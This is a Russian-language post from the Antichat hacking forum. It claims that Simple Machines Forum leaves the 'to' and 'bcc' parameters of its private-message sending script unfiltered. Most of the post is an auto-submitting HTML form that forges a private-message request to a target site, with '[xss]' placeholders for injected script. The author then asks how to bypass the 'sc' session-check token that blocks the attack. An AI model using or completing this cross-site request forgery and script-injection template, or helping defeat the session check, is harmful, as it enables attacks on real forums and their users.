Форум АНТИЧАТ - Smf, не фильтруются спецсимволы

Собственно Simple Machines Forum известный хорошо защищенный форум =)
Во всех версиях на момент написания поста в параметрах to и bcc в сценарии index.php не фильтруются спецсимволы.
Можно было бы организовать редирект аналогичный xss в ipb :

Код:

<html>

<body onLoad="document.REPLIER.submit();">

<h3>1</h3>

<form action="http://site/index.php?action=pm;sa=send2" method="post" name="REPLIER">

<input type="hidden" name="to" value='[xss]'>

<input type="hidden" name="bcc" value='[xss]'>

<input type="hidden" name="subject" value='text'>

<input type="hidden" name="message" value='text'>

<input type="hidden" name="replied_to" value='0'>

<input type="hidden" name="f" value='inbox'>

<input type="hidden" name="l" value='-1'>

</form>        

</body>

</html>

Только есть ещё 1 параметр sc проверяющий перед написанием письма сессию юзверя =))
Его как-нибудь можно обойти?